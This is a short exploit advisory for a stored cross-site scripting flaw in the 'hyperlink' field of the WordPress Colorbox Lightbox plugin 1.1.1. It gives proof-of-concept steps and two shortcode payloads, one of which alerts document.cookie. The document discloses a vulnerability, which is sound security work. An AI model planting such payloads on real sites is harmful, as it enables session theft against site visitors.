Authored by n1x_

WordPress Colorbox Lightbox plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
# Date: 10.8.2020.
# Exploit Author: n1x_ [MS-WEB]
# Software Homepage:
# Software Link (v1.1.1):
# Product Version: 1.1.1


# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library.

# Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability.

[Proof of Concept]

# 1. Authorization as user with privileges to write and publish posts
# 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post
# 3. The code is stored on the post

[Example payloads]

# Example payload 1: [wp_colorbox_media url="" type="youtube" hyperlink="<script>alert(document.cookie)</script>"]

# Example payload 2: [wp_colorbox_media url="" type="youtube" hyperlink="<script>alert('sampletext')</script>"]


<a class="wp-colorbox-youtube" href=""><script>alert('sampletext')</script></a>